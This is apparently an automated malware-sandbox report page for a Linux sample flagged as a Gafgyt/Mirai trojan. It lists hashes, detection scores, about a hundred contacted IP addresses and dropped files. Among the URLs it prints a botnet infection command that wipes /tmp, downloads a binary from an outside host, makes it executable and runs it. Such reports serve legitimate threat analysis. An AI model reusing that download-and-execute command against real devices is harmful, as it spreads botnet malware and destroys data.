1xtO9V8ku8

Status: finished

Submission Time: 2022-01-14 23:48:13 +01:00

Malicious

Trojan

Evader

Gafgyt Mirai

Comments

Details

Analysis ID:
553464
API (Web) ID:
920985
Analysis Started:

2022-01-14 23:55:55 +01:00
Analysis Finished:

2022-01-15 00:04:07 +01:00
MD5:
aac6e25e1d471c889b0ae7b3939e84ed
SHA1:
ed2e1aaf171b7bb4d24c543781f7f831fabe1c61
SHA256:
408362634ac9615317b22bea3be9caba9a1ba70db48ff41a9fdd27b60074612e
Technologies:

Engines
IOCs

Joe Sandbox

Engine	Download Report	Detection	Info
	Full Report Management Report IOC Report	malicious Score: 100	System: Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)

Third Party Analysis Engines

Open Full Report

malicious

Score: 9/42

malicious

Score: 15/43

IPs

IP	Country	Detection
104.1.204.68	United States
159.91.118.199	United States
59.101.199.215	Australia
Click to see the 97 hidden entries
176.57.79.198	Russian Federation
93.1.130.80	France
44.118.115.167	United States
149.27.123.191	Kazakhstan
184.2.91.221	United States
53.11.56.88	Germany
171.43.14.219	China
53.220.219.81	Germany
44.196.148.250	United States
5.114.132.141	Iran (ISLAMIC Republic Of)
70.140.150.58	United States
40.185.109.192	United States
158.242.12.252	United States
186.186.117.84	Venezuela
178.91.183.200	Kazakhstan
151.249.236.209	Czech Republic
121.30.154.145	China
204.12.98.68	United States
163.87.229.224	France
197.243.99.60	Rwanda
190.133.162.93	Uruguay
174.155.124.236	United States
177.180.254.130	Brazil
223.15.201.231	China
40.58.230.164	United States
131.102.76.251	Switzerland
166.93.1.104	Reserved
157.197.246.126	Korea Republic of
118.240.23.117	Japan
19.11.67.72	United States
82.49.65.53	Italy
41.108.245.6	Algeria
60.248.126.73	Taiwan; Republic of China (ROC)
8.107.28.253	United States
105.189.12.229	Morocco
120.70.150.33	China
207.114.244.32	United States
187.87.170.252	Brazil
181.71.150.144	Colombia
170.187.70.79	United States
209.212.174.247	United States
143.241.129.61	United States
162.30.206.102	United States
75.34.155.11	United States
20.112.77.81	United States
169.248.203.163	United States
119.106.78.235	Japan
48.21.211.95	United States
204.156.187.82	United States
46.56.82.247	Belarus
80.132.5.126	Germany
38.153.88.159	United States
50.138.60.221	United States
104.30.121.98	United States
53.153.108.52	Germany
156.72.230.180	United States
156.228.63.60	Seychelles
71.19.55.97	Canada
20.219.183.2	United States
192.47.110.8	Japan
47.44.9.235	United States
156.49.195.221	Sweden
112.85.175.115	China
44.223.156.7	United States
220.74.4.214	Korea Republic of
108.52.208.147	United States
141.201.89.75	Austria
126.127.82.18	Japan
74.52.52.14	United States
53.152.59.75	Germany
70.150.15.221	United States
110.111.162.22	China
129.17.231.111	United States
32.213.106.159	United States
167.236.98.20	United States
194.16.168.83	Sweden
210.75.10.103	China
176.131.97.133	France
142.154.33.75	Saudi Arabia
95.252.144.225	Italy
168.96.193.109	Argentina
79.118.248.134	Romania
190.45.54.178	Chile
60.11.198.147	China
220.250.160.228	China
209.143.100.57	United States
79.93.200.239	France
2.203.114.164	Germany
14.112.161.254	China
36.28.252.139	China
45.130.62.153	Israel
32.173.232.222	United States
184.89.111.3	United States
58.110.34.63	Australia
166.87.120.234	Saudi Arabia
67.164.149.29	United States
62.167.11.173	Switzerland

URLs

Name	Detection
http://upx.sf.net
http://127.0.0.1:80/shell?cd+/tmp;rm+-rf+*;wget+104.244.72.234/Fourloko/Fourloko.arm6;chmod+777+/tmp/Fourloko.arm6;sh+/tmp/Fourloko.arm6+Jaws

Dropped files

Name	File Type	Hashes
/var/cache/man/sr/5419	GNU dbm 1.x or ndbm database, little endian, 64-bit	#
/var/cache/man/ko/index.db.CHkWlX	GNU dbm 1.x or ndbm database, little endian, 64-bit	#
/var/cache/man/nl/5419	GNU dbm 1.x or ndbm database, little endian, 64-bit	#
Click to see the 50 hidden entries
/var/cache/man/nl/index.db.GufyBY	GNU dbm 1.x or ndbm database, little endian, 64-bit	#
/var/cache/man/pl/5419	GNU dbm 1.x or ndbm database, little endian, 64-bit	#
/var/cache/man/pl/index.db.a5HjTW	GNU dbm 1.x or ndbm database, little endian, 64-bit	#
/var/cache/man/pt/5419	GNU dbm 1.x or ndbm database, little endian, 64-bit	#
/var/cache/man/pt/index.db.L3jLjW	GNU dbm 1.x or ndbm database, little endian, 64-bit	#
/var/cache/man/pt_BR/5419	GNU dbm 1.x or ndbm database, little endian, 64-bit	#
/var/cache/man/pt_BR/index.db.oojnzZ	GNU dbm 1.x or ndbm database, little endian, 64-bit	#
/var/cache/man/ru/5419	GNU dbm 1.x or ndbm database, little endian, 64-bit	#
/var/cache/man/ru/index.db.AC78mY	GNU dbm 1.x or ndbm database, little endian, 64-bit	#
/var/cache/man/sl/5419	GNU dbm 1.x or ndbm database, little endian, 64-bit	#
/var/cache/man/sl/index.db.pkc8DW	GNU dbm 1.x or ndbm database, little endian, 64-bit	#
/var/cache/man/ko/5419	GNU dbm 1.x or ndbm database, little endian, 64-bit	#
/var/cache/man/sr/index.db.S5MaDX	GNU dbm 1.x or ndbm database, little endian, 64-bit	#
/var/cache/man/sv/5419	GNU dbm 1.x or ndbm database, little endian, 64-bit	#
/var/cache/man/sv/index.db.NVNacY	GNU dbm 1.x or ndbm database, little endian, 64-bit	#
/var/cache/man/tr/5419	GNU dbm 1.x or ndbm database, little endian, 64-bit	#
/var/cache/man/tr/index.db.OMgcpY	GNU dbm 1.x or ndbm database, little endian, 64-bit	#
/var/cache/man/zh_CN/5419	GNU dbm 1.x or ndbm database, little endian, 64-bit	#
/var/cache/man/zh_CN/index.db.zJimoZ	GNU dbm 1.x or ndbm database, little endian, 64-bit	#
/var/cache/man/zh_TW/5419	GNU dbm 1.x or ndbm database, little endian, 64-bit	#
/var/cache/man/zh_TW/index.db.jpfpKZ	GNU dbm 1.x or ndbm database, little endian, 64-bit	#
/var/lib/logrotate/status.tmp	ASCII text	#
/var/log/cups/access_log.1.gz	gzip compressed data, last modified: Fri Jan 14 22:56:00 2022, from Unix	#
/var/log/syslog.1.gz	gzip compressed data, last modified: Fri Jan 14 22:56:01 2022, from Unix	#
/var/cache/man/fr.UTF-8/5419	GNU dbm 1.x or ndbm database, little endian, 64-bit	#
/var/cache/man/cs/5419	GNU dbm 1.x or ndbm database, little endian, 64-bit	#
/var/cache/man/cs/index.db.OidWsZ	GNU dbm 1.x or ndbm database, little endian, 64-bit	#
/var/cache/man/da/5419	GNU dbm 1.x or ndbm database, little endian, 64-bit	#
/var/cache/man/da/index.db.Tx9djV	GNU dbm 1.x or ndbm database, little endian, 64-bit	#
/var/cache/man/de/5419	GNU dbm 1.x or ndbm database, little endian, 64-bit	#
/var/cache/man/de/index.db.QeAR9Y	GNU dbm 1.x or ndbm database, little endian, 64-bit	#
/var/cache/man/es/5419	GNU dbm 1.x or ndbm database, little endian, 64-bit	#
/var/cache/man/es/index.db.7BpmSY	GNU dbm 1.x or ndbm database, little endian, 64-bit	#
/var/cache/man/fi/5419	GNU dbm 1.x or ndbm database, little endian, 64-bit	#
/var/cache/man/fi/index.db.UDmH4W	GNU dbm 1.x or ndbm database, little endian, 64-bit	#
/var/cache/man/fr.ISO8859-1/5419	GNU dbm 1.x or ndbm database, little endian, 64-bit	#
/var/cache/man/fr.ISO8859-1/index.db.93HFlX	GNU dbm 1.x or ndbm database, little endian, 64-bit	#
/var/cache/man/5419	GNU dbm 1.x or ndbm database, little endian, 64-bit	#
/var/cache/man/fr.UTF-8/index.db.1j2FZY	GNU dbm 1.x or ndbm database, little endian, 64-bit	#
/var/cache/man/fr/5419	GNU dbm 1.x or ndbm database, little endian, 64-bit	#
/var/cache/man/fr/index.db.kCK1BY	GNU dbm 1.x or ndbm database, little endian, 64-bit	#
/var/cache/man/hu/5419	GNU dbm 1.x or ndbm database, little endian, 64-bit	#
/var/cache/man/hu/index.db.oktA6X	GNU dbm 1.x or ndbm database, little endian, 64-bit	#
/var/cache/man/id/5419	GNU dbm 1.x or ndbm database, little endian, 64-bit	#
/var/cache/man/id/index.db.Yrsi7X	GNU dbm 1.x or ndbm database, little endian, 64-bit	#
/var/cache/man/index.db.C1CCCV	GNU dbm 1.x or ndbm database, little endian, 64-bit	#
/var/cache/man/it/5419	GNU dbm 1.x or ndbm database, little endian, 64-bit	#
/var/cache/man/it/index.db.Oz0gYV	GNU dbm 1.x or ndbm database, little endian, 64-bit	#
/var/cache/man/ja/5419	GNU dbm 1.x or ndbm database, little endian, 64-bit	#
/var/cache/man/ja/index.db.XKudCZ	GNU dbm 1.x or ndbm database, little endian, 64-bit	#

1xtO9V8ku8

Comments

Tags

Available tags:

Details

Joe Sandbox

Third Party Analysis Engines

IPs

URLs

Dropped files

1xtO9V8ku8 Options

Comments

Tags

Available tags:

Details

Joe Sandbox

Third Party Analysis Engines

IPs

URLs

Dropped files

Search started

1xtO9V8ku8